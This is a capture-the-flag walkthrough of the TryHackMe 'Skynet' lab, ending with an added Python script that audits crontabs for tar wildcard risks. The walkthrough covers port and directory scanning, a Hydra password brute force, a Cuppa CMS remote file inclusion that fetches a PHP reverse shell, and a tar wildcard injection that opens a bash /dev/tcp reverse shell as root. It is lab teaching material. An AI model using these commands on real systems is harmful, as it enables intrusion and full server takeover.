Categories: walkthrough
Tags: tryhackme, PrivEsc, PrivEsc-Linux, Linux-Machine, wildcard, wildcard-injection, tar
$ nmap -p1-65535 10.10.200.150 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:07 IST
Initiating Ping Scan at 19:07
Scanning 10.10.200.150 [2 ports]
Completed Ping Scan at 19:07, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:07
Scanning 10.10.200.150 [6 ports]
Discovered open port 445/tcp on 10.10.200.150
Discovered open port 22/tcp on 10.10.200.150
Discovered open port 80/tcp on 10.10.200.150
Discovered open port 143/tcp on 10.10.200.150
Discovered open port 139/tcp on 10.10.200.150
Discovered open port 110/tcp on 10.10.200.150
Completed Connect Scan at 19:07, 0.37s elapsed (6 total ports)
Nmap scan report for 10.10.200.150
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-03 19:07:27 IST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
110/tcp open pop3 syn-ack
139/tcp open netbios-ssn syn-ack
143/tcp open imap syn-ack
445/tcp open microsoft-ds syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
$ nmap -sV -sC -p22,80,110,139,143,445 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA SASL PIPELINING RESP-CODES UIDL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID SASL-IR capabilities IMAP4rev1 OK LITERAL+ post-login have ENABLE LOGINDISABLEDA0001 listed LOGIN-REFERRALS more Pre-login IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-07-03T08:39:37-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T13:39:37
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds
Known CVEs for the detected versions:
Username Enumeration - CVE-2016-6210 (OpenSSH 7.2p2)
Local Privilege Escalation - CVE-2019-0211 (Apache 2.4.18)
The home page has nothing useful and no input forms; the search bar does not send anything to the backend.
Let's fuzz for directories:
$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.200.150/FUZZ -e .php,.html,.txt,.phtml,.php5,.php3 -ic -t 150
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.200.150/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .phtml .php5 .php3
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.html [Status: 403, Size: 278, Words: 20, Lines: 10]
[Status: 200, Size: 523, Words: 26, Lines: 19]
.php [Status: 403, Size: 278, Words: 20, Lines: 10]
.phtml [Status: 403, Size: 278, Words: 20, Lines: 10]
.php3 [Status: 403, Size: 278, Words: 20, Lines: 10]
.php5 [Status: 403, Size: 278, Words: 20, Lines: 10]
index.html [Status: 200, Size: 523, Words: 26, Lines: 19]
admin [Status: 301, Size: 314, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
config [Status: 301, Size: 315, Words: 20, Lines: 10]
ai [Status: 301, Size: 311, Words: 20, Lines: 10]
squirrelmail [Status: 301, Size: 321, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 364 req/sec :: Duration: [1:07:47] :: Errors: 46 ::
Navigating to the directories discovered by ffuf, most of them return a permission denied error. The squirrelmail directory greets us with a login page.
There is no juicy information on POP3 and IMAP:
$ nc -nv 10.10.200.150 110
(UNKNOWN) [10.10.200.150] 110 (pop3) open
+OK Dovecot ready.
LIST
-ERR Unknown command.
CAPA
+OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
SASL
.
USER root
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
$ nc -nv 10.10.200.150 143
(UNKNOWN) [10.10.200.150] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
Samba has SMBv1 enabled:
$ nmap -p139 --script smb-protocols 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.38s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2.02
| 2.10
| 3.00
| 3.02
|_ 3.11
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds
Let's check the Samba shares:
$ smbmap -H 10.10.200.150
[+] Guest session IP: 10.10.200.150:445 Name: 10.10.200.150
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
We have two shares of interest, anonymous and milesdyson. Let's try to connect to both of them and obtain whatever information they hold:
$ smbclient \\\\10.10.200.150\\anonymous -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Nov 26 21:34:00 2020
.. D 0 Tue Sep 17 12:50:17 2019
attention.txt N 163 Wed Sep 18 08:34:59 2019
logs D 0 Wed Sep 18 10:12:16 2019
9204224 blocks of size 1024. 5526764 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
. D 0 Wed Sep 18 10:12:16 2019
.. D 0 Thu Nov 26 21:34:00 2020
log2.txt N 0 Wed Sep 18 10:12:13 2019
log1.txt N 471 Wed Sep 18 10:11:59 2019
log3.txt N 0 Wed Sep 18 10:12:16 2019
9204224 blocks of size 1024. 5526828 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> exit
$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Let's check the files we got from the anonymous share:
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
[...snip...]
$ cat log2.txt
$ cat log3.txt
Using the details provided in the anonymous share, let's try to brute-force the SquirrelMail login page with milesdyson as the username and the values in log1.txt as passwords.
Burp can be used to obtain the password. Using Hydra:
$ hydra -l milesdyson -P /home/user/log1.txt 10.10.200.150 http-form-post '/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.' -I
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-03 21:22:43
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.200.150:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.200.150 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-03 21:22:55
Username: milesdyson Password: cyborg007haloterminator
When we log in with these credentials on the login page, we are greeted with milesdyson's inbox. One of the mails contains the password for the Samba share:
Password: )s{A&2Z=F^n_E.B`
Let's use this password to log in to the Samba share:
$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019
9204224 blocks of size 1024. 5526612 blocks available
smb: \> cd notes
smb: \notes\> dir
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
[...snip...]
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019
9204224 blocks of size 1024. 5526612 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\>
Of all the files in the share, important.txt stands out. Let's check it:
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
There is a /45kra24zxs28v3yd directory for the beta CMS. Navigating to the page shows nothing much, so let's fuzz for directories:
$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.200.150/45kra24zxs28v3yd/FUZZ -ic -e .php,.txt,.php3,.php5,.phtml,.txt -t 200
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.200.150/45kra24zxs28v3yd/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Extensions : .php .txt .php3 .php5 .phtml .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
administrator [Status: 301, Size: 339, Words: 20, Lines: 10]
Fuzzing gives us the administrator directory. Navigating to it, we are greeted with a Cuppa CMS login page; the previously obtained credentials did not grant access.
Searching for public exploits for Cuppa shows a remote file inclusion vulnerability:
$ searchsploit cuppa
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cat /usr/share/exploitdb/exploits/php/webapps/25971.txt
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Using the file inclusion vulnerability to gain initial access (<ip> is our own host serving the reverse shell):
$ curl http://10.10.200.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php\?urlConfig\=http://<ip>:8991/php-reverse-shell.php
Getting the user flag.
Spawning a TTY:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@skynet:/$ ^Z
[1] + 7087 suspended nc -nlvp 8989
$ stty raw -echo; fg
[1] + 7087 continued nc -nlvp 8989
www-data@skynet:/$ pwd
/
Let's check for privilege escalation techniques.
After trying various techniques, we find a script in the crontab that runs with root privileges every minute.
Using tar wildcard injection to escalate our privileges:
www-data@skynet:/$ cd /var/www/html
www-data@skynet:/var/www/html$ printf '#!/bin/bash\nbash -i >& /dev/tcp/<ip>/8585 0>&1\n' > rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint-action=exec=bash\ rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint=1
Getting the root flag.
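As an added defender-side example (not part of the original walkthrough): a small Python audit that flags crontab entries running tar over a bare wildcard, the pattern this privilege escalation depends on, and lists option-style filenames left behind in a directory. The crontab text and the temporary web root are constructed here; the fix for a flagged job is to anchor the glob (`./*`) or put `--` before it.

```python
import os
import re
import shlex
import tempfile
# Constructed /etc/crontab sample (5 time fields, user, command), modelled on the
# kind of root job the walkthrough abuses: tar over a web root with a bare '*'.
SAMPLE_CRONTAB = """\
*/1 * * * * root /home/backup/backup.sh
*/5 * * * * root cd /var/www/html && tar cf /home/backup/site.tgz *
0 3 * * * root tar czf /home/backup/logs.tgz -- /var/log/*.log
0 4 * * * www-data tar czf /tmp/site.tgz ./*
"""
def tar_with_bare_glob(command):
    """True if a tar invocation in `command` passes an unanchored glob: the shell
    expands a bare '*', so a file named '--checkpoint=1' becomes an option tar
    honours. './*', '/path/*' and anything after '--' cannot, so are not flagged."""
    for segment in re.split(r"&&|\|\||;|\|", command):  # split shell lists/pipes
        argv = shlex.split(segment)
        if not argv or os.path.basename(argv[0]) != "tar":
            continue
        after_dashdash = False
        for arg in argv[1:]:
            if arg == "--":
                after_dashdash = True
            elif "*" in arg and not after_dashdash and not arg.startswith(("./", "/")):
                return True
    return False

def risky_cron_jobs(crontab_text):
    """Commands of crontab entries that run tar with a bare glob. Scripts that
    cron calls (backup.sh above) still have to be read by hand."""
    risky = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)  # 5 time fields + user + command
        if len(parts) == 7 and tar_with_bare_glob(parts[6]):
            risky.append(parts[6])
    return risky

def option_named_files(directory):
    """Names starting with '-': the artefacts an injection attempt leaves behind."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))

def demo_directory():  # constructed web root holding one injected option-style name
    path = tempfile.mkdtemp()
    for name in ("index.html", "--checkpoint=1"):
        open(os.path.join(path, name), "w").close()
    return path
```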